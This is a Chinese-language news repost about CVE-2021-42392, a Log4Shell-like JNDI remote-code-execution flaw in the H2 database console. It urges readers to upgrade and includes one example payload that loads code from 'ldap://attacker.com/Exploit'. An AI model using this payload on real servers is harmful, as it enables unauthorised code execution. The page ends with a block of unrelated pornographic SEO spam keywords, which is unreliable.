警告!與Log4Shell相似的Java漏洞出現了

2022-10-05    分類: 網站建設

警告!與Log4Shell相似的Java漏洞出現了

安全研究人員警告稱,一個最新的嚴重的Java錯誤,其本質與目前在全球范圍內利用的臭名昭著的 Log4Shell 漏洞相同 。

CVE-2021-42392 尚未在國家漏洞數據庫 (NVD) 中正式發布,但據軟件企業內JFrog 稱,它影響了流行的H2 Java SQL 數據庫的控制臺。

這家安全公司提醒,任何目前運行的暴露于其 LAN 或 WAN 的 H2 控制臺的組織立即將數據庫更新到 2.0.206 版本,否則攻擊者可能會利用它進行未經身份驗證的遠程代碼執行 (RCE)。

與 Log4Shell 一樣,該錯誤與 JNDI(Java 命名和目錄接口)“遠程類加載”有關。JNDI 是一種為 Java 應用程序提供命名和目錄功能的 API。這意味著如果攻擊者可以將惡意 URL 獲取到 JNDI 查找中,它就可以啟用 RCE。

“簡而言之,根本原因類似于 Log4Shell——H2 數據庫框架中的多個代碼路徑將未經過濾的攻擊者控制的 URL 傳遞給 javax.naming.Context.lookup 函數,該函數允許遠程代碼庫加載(AKA Java 代碼注入 AKA遠程代碼執行),” JFrog 解釋道。

“具體來說,org.h2.util.JdbcUtils.getConnection 方法以驅動類名和數據庫 URL 作為參數。如果驅動程序的類可分配給 javax.naming.Context 類,則該方法會從中實例化一個對象并調用其查找方法。”

提供諸如“javax.naming.InitialContext”之類的驅動程序類和像 ldap://attacker.com/Exploit 這樣簡單的 URL 將導致遠程代碼執行。

JFrog 表示,該漏洞特別危險,因為 H2 數據庫包特別受歡迎。該公司聲稱,它是前 50 個最受歡迎的 Maven 軟件包之一,擁有近 7000 個工件依賴項。

但是,有一些原因導致利用不會像 Log4Shell 那樣廣泛。一方面,它具有“直接影響范圍”,這意味著易受攻擊的服務器應該更容易找到。其次,在大多數 H2 發行版中,控制臺只監聽 localhost 連接,這意味著默認設置是不可利用的。

“許多供應商可能正在運行 H2 數據庫,但沒有運行 H2 控制臺,雖然除了控制臺之外還有其他向量可以利用這個問題,但這些其他向量是依賴于上下文的,不太可能暴露給遠程攻擊者。”JFrog 補充道。

標題名稱:警告!與Log4Shell相似的Java漏洞出現了
URL網址:http://m.kartarina.com/news14/202264.html

成都網站建設公司_創新互聯,為您提供云服務器品牌網站設計電子商務全網營銷推廣外貿建站手機網站建設

廣告

聲明:本網站發布的內容(圖片、視頻和文字)以用戶投稿、用戶轉載內容為主,如果涉及侵權請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網站立場,如需處理請聯系客服。電話:028-86922220;郵箱:631063699@qq.com。內容未經允許不得轉載,或轉載時需注明來源: 創新互聯

成都網頁設計公司
主站蜘蛛池模板: 蜜芽亚洲av无码精品色午夜| 国产精品无码专区在线观看| 久久久久无码国产精品一区| 亚洲av无码国产精品夜色午夜| 午夜福利无码不卡在线观看| 好爽毛片一区二区三区四无码三飞| 一本大道无码人妻精品专区| 精品久久久久久无码专区不卡| 在线A级毛片无码免费真人| 岛国无码av不卡一区二区| 亚洲精品9999久久久久无码| 亚洲AV日韩AV永久无码久久| 国产av无码专区亚洲av毛片搜| 无码精品日韩中文字幕| 亚洲无码日韩精品第一页| 亚洲av永久中文无码精品综合| 伊人久久综合精品无码AV专区| 免费无码又爽又刺激毛片| 精品人妻系列无码一区二区三区 | 无码国内精品人妻少妇| 精品无码成人片一区二区| 亚洲a∨无码男人的天堂| 国产精品无码久久综合| 国产乱子伦精品免费无码专区| 亚洲国产成人无码AV在线影院 | 永久免费AV无码国产网站 | 久久久久亚洲AV无码麻豆| 亚洲人成国产精品无码| 亚洲成a人在线看天堂无码 | 亚洲av无码一区二区乱子伦as| 最新亚洲人成无码网www电影| 亚洲性无码AV中文字幕| 色综合久久中文字幕无码| 国产亚洲AV无码AV男人的天堂| 中文字幕乱码无码人妻系列蜜桃| 亚洲午夜无码AV毛片久久| 国产日韩AV免费无码一区二区三区 | 成人无码一区二区三区| 狠狠爱无码一区二区三区| 色综合久久久无码中文字幕波多| 久久精品无码一区二区三区不卡|